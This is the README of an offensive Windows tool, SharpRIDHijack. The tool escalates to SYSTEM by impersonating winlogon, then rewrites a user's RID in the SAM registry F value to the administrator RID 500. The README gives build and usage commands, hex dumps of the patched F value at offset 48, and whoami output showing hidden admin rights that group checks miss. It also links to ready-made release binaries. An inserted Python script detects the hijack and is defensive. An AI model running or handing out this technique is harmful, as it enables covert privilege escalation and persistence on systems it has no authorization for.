path: root/README.md
blob: 4c88a9ced834921a91f42512dda54667d3239429 (plain)
# SharpRIDHijack

`SharpRIDHijack` is an offensive security tool designed for performing RID (Relative Identifier) hijacking on Windows systems. It escalates privileges by impersonating the SYSTEM account and modifying the SAM registry to assign an administrative RID to a specified user account. 

> **WARNING**: This tool is for **authorized security testing only**. Unauthorized use may violate laws and regulations. The author and contributors are not responsible for misuse. Always obtain explicit permission before testing any system.

## Features

- **Privilege Escalation**: Escalates to SYSTEM by impersonating the winlogon process token.
- **RID Hijacking**: Modifies the SAM registry to assign an administrative RID (default: 500) to a target user.

## Installation

### Prerequisites

- **.NET Framework**: Version 4.7.2 or later.
- **Visual Studio or MSBuild**: For compiling the C# source code.
- **Git**: To clone the repository.
- **Windows**: Compatible with Windows 10/11 (other versions may require adjusting the offset at which the RID is located in the SAM registry F value).

### Steps

- Clone the repository:

```
PS C:\> git clone https://github.com/heqnx/SharpRIDHijack.git
PS C:\> cd SharpRIDHijack
```

- Compile the source code with Visual Studio by opening `SharpRIDHijack.sln`

- Alternatively, compile with MSBuild:

```
PS C:\> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe SharpRIDHijack.csproj
```

## Usage

### Command-Line Flags

- Run `SharpRIDHijack.exe` with a target username to perform RID hijacking. The tool requires administrative privileges.

```
Usage: SharpRIDHijack.exe <username>
```

## Examples

### Perform RID Hijacking via Command-Line

- Hijack the RID of the `lowpriv` user to grant administrative privileges:

```
PS C:\> SharpRIDHijack.exe lowpriv
[inf] SeDebugPrivilege enabled
[inf] Successfully impersonated WinLogon, running as NT AUTHORITY\SYSTEM
[inf] Original RID: 000003EB (1003)
[inf] Original F value:
03 00 01 00 00 00 00 00 CB 5C 3B 54 CA B5 DB 01 00 00 00 00 00 00 00 00 F4 6D 86 48 CA B5 DB 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 EB 03 00 00 01 02 00 00 10 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00
[inf] Found RID 1003 at offset 48
[inf] New F value:
03 00 01 00 00 00 00 00 CB 5C 3B 54 CA B5 DB 01 00 00 00 00 00 00 00 00 F4 6D 86 48 CA B5 DB 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F4 01 00 00 01 02 00 00 10 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00
```

- Note that the user is not listed in the Administrators group when checking with `net user`:

```
PS C:\> net user lowpriv
User name                    lowpriv

...

Local Group Memberships      *Users
Global Group memberships     *None
The command completed successfully.
```

- User does show up with an administrator RID and associated privileges:

```
PS C:\> whoami /user

USER INFORMATION
----------------

User Name               SID
======================= ============================================
DESKTOP-C9VFZ4T\lowpriv S-1-5-21-1743776718-435079111-2757990620-500

PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== ========
...
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
...
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled
...
```
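The before/after dumps above show where the RID lives inside a SAM user key's F value (offset 48, little-endian) and that the key name itself still carries the original RID in hex (`000003EB`). As an added defender-side example, not part of SharpRIDHijack, the following Python check applies that layout to detect a hijacked account: it compares the RID encoded in the key name with the RID stored in F and flags any disagreement. The offset and the sample bytes are taken from the dump above; the Administrator key's F value is constructed here for illustration.

```python
import struct

# Offset of the little-endian 32-bit RID inside a SAM user key's F value, as the
# tool output above reports ("Found RID 1003 at offset 48"). Assumed here to be
# valid only for the Windows versions the README names.
RID_OFFSET = 48
ADMIN_RID = 500

def parse_f_dump(hex_dump: str) -> bytes:
    """Convert a space-separated hex dump, as printed by the tool, into bytes."""
    return bytes.fromhex(hex_dump.replace(" ", ""))

def rid_from_f(f_value: bytes) -> int:
    """Read the RID stored inside the F value."""
    if len(f_value) < RID_OFFSET + 4:
        raise ValueError("F value too short to contain a RID at offset %d" % RID_OFFSET)
    return struct.unpack_from("<I", f_value, RID_OFFSET)[0]

def check_user_key(key_name: str, f_value: bytes) -> dict:
    """Compare the RID in the key name (8 hex digits, e.g. 000003EB) with the RID
    inside F. A mismatch is the signature of RID hijacking."""
    key_rid = int(key_name, 16)
    f_rid = rid_from_f(f_value)
    return {"key_rid": key_rid, "f_rid": f_rid,
            "mismatch": key_rid != f_rid,
            "grants_admin": f_rid == ADMIN_RID and key_rid != ADMIN_RID}

def find_hijacked(users: dict) -> list:
    """Return the key names whose F value RID disagrees with the key name."""
    return sorted(k for k, f in users.items() if check_user_key(k, f)["mismatch"])

# Constructed sample data: the original F value from the example above, the same
# value with the RID patched to 500 (matching the "New F value" dump), and a
# synthetic built-in Administrator key (RID 500) whose F value is consistent.
ORIGINAL_F = parse_f_dump(
    "03 00 01 00 00 00 00 00 CB 5C 3B 54 CA B5 DB 01 00 00 00 00 00 00 00 00 "
    "F4 6D 86 48 CA B5 DB 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "
    "EB 03 00 00 01 02 00 00 10 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 "
    "00 00 00 00 00 00 00 00")
HIJACKED_F = ORIGINAL_F[:RID_OFFSET] + struct.pack("<I", ADMIN_RID) + ORIGINAL_F[RID_OFFSET + 4:]
ADMIN_F = bytes(RID_OFFSET) + struct.pack("<I", ADMIN_RID) + bytes(28)

SAMPLE_USERS = {"000001F4": ADMIN_F, "000003EB": HIJACKED_F}

if __name__ == "__main__":
    for name, f in SAMPLE_USERS.items():
        print(name, check_user_key(name, f))
    print("suspicious keys:", find_hijacked(SAMPLE_USERS))
```

On a live system the same check can be run over every subkey of the SAM `Users` key once its F values have been exported, which catches the hijack that `net user` misses because group membership is untouched.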

## Automated Releases

Check the GitHub Releases page for the latest release with attached binaries.

## License

This project is licensed under the GNU GENERAL PUBLIC LICENSE. See the LICENSE file for details.

## Disclaimer

`SharpRIDHijack` is provided "as is" without warranty. The author and contributors are not liable for any damages or legal consequences arising from its use. Use responsibly and only in authorized environments.